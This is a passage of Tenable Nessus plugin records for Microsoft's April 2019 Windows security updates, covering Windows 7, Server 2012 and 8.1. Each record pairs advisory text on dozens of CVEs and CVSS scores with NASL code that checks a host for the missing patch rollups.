that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)\");\n # https://support.microsoft.com/en-us/help/4493472/windows-7-update-kb4493472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6116930e\");\n # https://support.microsoft.com/en-us/help/4493448/windows-7-update-kb4493448\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7d5c746a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4493448 or Cumulative Update KB4493472.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0853\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-04\";\nkbs = make_list('4493448', '4493472');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"04_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4493448, 4493472])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:45:37", "description": "The remote Windows host is missing security update 4493450\nor cumulative update 4493451. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0688)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0790,\n CVE-2019-0791, CVE-2019-0792, CVE-2019-0793,\n CVE-2019-0795)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0803, CVE-2019-0859)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0844)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-09T00:00:00", "title": "KB4493450: Windows Server 2012 April 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0846", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0859", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0856", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0849", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_APR_4493451.NASL", "href": "https://www.tenable.com/plugins/nessus/123941", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123941);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2020/01/22\");\n\n script_cve_id(\n \"CVE-2019-0688\",\n \"CVE-2019-0730\",\n \"CVE-2019-0731\",\n \"CVE-2019-0732\",\n \"CVE-2019-0735\",\n \"CVE-2019-0752\",\n \"CVE-2019-0753\",\n \"CVE-2019-0764\",\n \"CVE-2019-0790\",\n \"CVE-2019-0791\",\n \"CVE-2019-0792\",\n \"CVE-2019-0793\",\n \"CVE-2019-0794\",\n \"CVE-2019-0795\",\n \"CVE-2019-0796\",\n \"CVE-2019-0802\",\n \"CVE-2019-0803\",\n \"CVE-2019-0805\",\n \"CVE-2019-0835\",\n \"CVE-2019-0836\",\n \"CVE-2019-0838\",\n \"CVE-2019-0839\",\n \"CVE-2019-0842\",\n \"CVE-2019-0844\",\n \"CVE-2019-0845\",\n \"CVE-2019-0846\",\n \"CVE-2019-0847\",\n \"CVE-2019-0848\",\n \"CVE-2019-0849\",\n \"CVE-2019-0851\",\n \"CVE-2019-0853\",\n \"CVE-2019-0856\",\n \"CVE-2019-0859\",\n \"CVE-2019-0862\",\n \"CVE-2019-0877\",\n \"CVE-2019-0879\"\n );\n script_xref(name:\"MSKB\", value:\"4493450\");\n script_xref(name:\"MSKB\", value:\"4493451\");\n script_xref(name:\"MSFT\", value:\"MS19-4493450\");\n script_xref(name:\"MSFT\", value:\"MS19-4493451\");\n\n script_name(english:\"KB4493450: Windows Server 2012 April 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4493450\nor cumulative update 4493451. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0688)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0790,\n CVE-2019-0791, CVE-2019-0792, CVE-2019-0793,\n CVE-2019-0795)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0803, CVE-2019-0859)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0844)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)\");\n # https://support.microsoft.com/en-us/help/4493450/windows-server-2012-update-kb4493450\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e6bb344b\");\n # https://support.microsoft.com/en-us/help/4493451/windows-server-2012-update-kb4493451\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3b9c0466\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4493450 or Cumulative Update KB4493451.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0853\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-04\";\nkbs = make_list('4493450', '4493451');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"04_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4493450, 4493451])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:45:37", "description": "The remote Windows host is missing security update 4493467\nor cumulative update 4493446. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0688)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0790,\n CVE-2019-0791, CVE-2019-0792, CVE-2019-0793,\n CVE-2019-0795)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0803, CVE-2019-0859)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0844)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-09T00:00:00", "title": "KB4493467: Windows 8.1 and Windows Server 2012 R2 April 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0846", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0859", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0856", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0849", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_APR_4493446.NASL", "href": "https://www.tenable.com/plugins/nessus/123940", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123940);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2020/01/22\");\n\n script_cve_id(\n \"CVE-2019-0688\",\n \"CVE-2019-0730\",\n \"CVE-2019-0731\",\n \"CVE-2019-0732\",\n \"CVE-2019-0735\",\n \"CVE-2019-0752\",\n \"CVE-2019-0753\",\n \"CVE-2019-0764\",\n \"CVE-2019-0790\",\n \"CVE-2019-0791\",\n \"CVE-2019-0792\",\n \"CVE-2019-0793\",\n \"CVE-2019-0794\",\n \"CVE-2019-0795\",\n \"CVE-2019-0796\",\n \"CVE-2019-0802\",\n \"CVE-2019-0803\",\n \"CVE-2019-0805\",\n \"CVE-2019-0835\",\n \"CVE-2019-0836\",\n \"CVE-2019-0838\",\n \"CVE-2019-0839\",\n \"CVE-2019-0842\",\n \"CVE-2019-0844\",\n \"CVE-2019-0845\",\n \"CVE-2019-0846\",\n \"CVE-2019-0847\",\n \"CVE-2019-0848\",\n \"CVE-2019-0849\",\n \"CVE-2019-0851\",\n \"CVE-2019-0853\",\n \"CVE-2019-0856\",\n \"CVE-2019-0859\",\n \"CVE-2019-0862\",\n \"CVE-2019-0877\",\n \"CVE-2019-0879\"\n );\n script_xref(name:\"MSKB\", value:\"4493446\");\n script_xref(name:\"MSKB\", value:\"4493467\");\n script_xref(name:\"MSFT\", value:\"MS19-4493446\");\n script_xref(name:\"MSFT\", value:\"MS19-4493467\");\n\n script_name(english:\"KB4493467: Windows 8.1 and Windows Server 2012 R2 April 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n 